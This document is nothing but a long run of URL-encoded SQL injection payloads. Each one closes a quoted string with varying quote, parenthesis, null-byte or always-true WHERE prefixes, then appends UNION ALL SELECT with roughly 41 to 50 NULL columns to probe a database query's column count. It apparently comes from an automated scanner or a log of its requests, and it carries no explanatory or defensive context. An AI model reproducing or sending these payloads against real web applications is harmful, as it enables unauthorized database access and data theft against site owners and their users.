foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%203728%3D3728%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%208433%3D8433%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%209079%3D9079%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%207606%3D7606%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%203071%3D3071%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%204472%3D4472%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%204016%3D4016%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%203869%3D3869%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%209609%3D9609%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%209862%3D9862%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%202356%3D2356%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%203468%3D3468%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%206007%3D6007%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%204542%3D4542%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%203456%3D3456%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201333%3D1333%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201422%3D1422%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 